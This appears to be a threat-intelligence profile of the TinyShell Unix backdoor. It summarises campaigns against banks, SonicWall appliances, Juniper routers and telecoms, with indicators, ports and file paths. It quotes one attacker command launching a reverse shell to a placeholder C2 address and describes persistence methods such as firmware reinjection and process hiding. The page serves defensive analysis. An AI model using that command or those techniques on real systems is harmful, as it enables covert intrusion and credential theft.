TinyShell is a Unix/Linux backdoor used for stealthy persistence and command-and-control across multiple intrusion campaigns. The content describes it as a backdoor deployed as an ELF binary and also as the basis for several custom variants. Observed capabilities include establishing persistent access, creating outbound or reverse-shell C2 channels, and in some cases supporting bind-shell mode. In UNC2891 intrusions against banking infrastructure in Indonesia, attackers deployed TinyShell on a physically implanted Raspberry Pi with a 4G modem and on internal servers, using a Dynamic DNS domain for C2. In that activity, the malware masqueraded as the LightDM display manager, used deceptive command-line arguments, and its processes were hidden via Linux bind mounts; investigators observed beaconing every 600 seconds and repeated connections involving port 929. TinyShell provided persistence on staging systems during lateral movement and helped attackers retain access even after the Raspberry Pi was removed via a backdoor on the bank’s mail server.
The malware is also documented in a suspected China-nexus campaign tracked as UNC4540 targeting unpatched SonicWall SMA appliances. There, the malware suite consisted of bash scripts plus a TinyShell variant located at /bin/httpsd, launched with nohup /bin/httpsd -c <C2 IP> -d 5 -m -1 -p 51432 to establish reverse-shell access; the variant also supported listening bind-shell mode and included a hard-coded fallback IP. In that campaign, TinyShell was one component of a broader persistence and credential-theft framework that stole hashed credentials from the appliance session database, stored them in /tmp/syslog.db, and survived firmware upgrades through scripts that reinjected the malware into new firmware images and added a backdoor user named acme.
Mandiant also reported that the China-nexus espionage actor UNC3886 deployed multiple TinyShell-based backdoors on end-of-life Juniper MX routers running Junos OS. The content states there were six distinct variants, including active and passive backdoor forms, with embedded scripts to disable logging and maintain stealth. During the RedPenguin campaign, UNC3886 used custom malware based on the publicly available TinyShell backdoor, with capabilities including interactive shell access, Junos CLI access, encrypted C2 using RC4, file upload/download over C2, SOCKS proxying, UDP/TCP communications, packet inspection for magic-string activation, and a default bind port of 45678. This activity was associated with exploitation of CVE-2025-21590 to bypass Junos OS Veriexec protections and inject malicious code into legitimate processes.
Across broader telecom espionage campaigns attributed to Red Menshen, TinyShell is described as a passive or stealthy persistence mechanism used alongside BPFDoor, CrossC2, Sliver, keyloggers, SSH brute-forcers, and China Chopper. In those operations it was used after initial access to maintain footholds on staging systems and support lateral movement toward telecom core environments. The content also notes TinyShell use in other malware/tooling ecosystems, including references to China Chopper and publicly available offensive frameworks. High-confidence indicators directly mentioned in the content include filenames and paths such as /bin/httpsd, /tmp/lightdm, /var/snap/.snapd/lightdm, and associated ports including 51432, 45678, and 929, as well as use of Dynamic DNS for C2.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Mandiant uncovered several TINYSHELL-based backdoors operating on Juniper Networks’ Junos OS routers.
6 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Common Patterns Across Intrusions Analysis of both intrusion sets, along with additional intelligence from other affected operators in this campaign, identified the following consistent patterns: TinyShell and China Chopper were both used to establish persistence on staging systems during lateral movement.
Using the TINYSHELL backdoor, the attacker established an outbound command-and-control (C2) channel via a Dynamic DNS domain.
Mandiant explained in a blog post that last year it discovered the UNC3886 “China-nexus espionage group” had deployed several TINYSHELL-based backdoors into Junos OS-powered routers.
The malware used on SonicWall devices consists of an ELF binary, the TinyShell backdoor, and several bash scripts that show a deep understanding of the targeted network devices.
Also dropped are Sliver, TinyShell (a Unix backdoor), keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
Also dropped are Sliver, TinyShell (a Unix backdoor), keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Attacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts.
A suspected Chinese hacking campaign has been targeting unpatched SonicWall Secure Mobile Access (SMA) appliances... While it is unclear what vulnerability was used to compromise devices, Mandiant says that the targeted devices were unpatched, making them likely vulnerable to older flaws.
Attacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts.
TinyShell and China Chopper were both used to establish persistence on staging systems during lateral movement.
"In March 2025, it was revealed that Chinese cyber-espionage actors were deploying custom backdoors on EoL Junos OS MX routers to drop a set of ‘TinyShell’ backdoor variants."
The blog details their techniques, including a novel process injection method to circumvent built-in protections...
Attacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts.
"UNC2891 deployed a range of custom malware, including CAKETAP (a Solaris/Linux rootkit)... attackers maintained undetected access for years"
the backdoor process, which was named “lightdm” in an attempt to masquerade as the legitimate LightDM display manger, but was found at an unusual location
The blog details their techniques, including a novel process injection method to circumvent built-in protections...
These backdoors included active and passive functions, and embedded scripts that disabled logging mechanisms on the device.
Also dropped are Sliver, TinyShell, keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
Using the TINYSHELL backdoor, the attacker established an outbound command-and-control (C2) channel via a Dynamic DNS domain.
where the BPFdoor controller was deployed... The BPFdoor backdoor was deployed on these systems for long-term persistence.
25 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A custom backdoor family used by UNC3886 on Junos OS routers, including active and passive backdoor functions and embedded scripts that disabled logging mechanisms on the device to support stealth and persistence.
A backdoor used to establish persistence on staging systems during lateral movement as part of the broader telecom intrusion campaign.
A backdoor used to establish outbound C2 access from the compromised ATM network via Dynamic DNS, enabling persistent remote access and bypassing perimeter defenses.
A stealthy persistence tool/backdoor used after initial access to maintain covert footholds in compromised environments.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.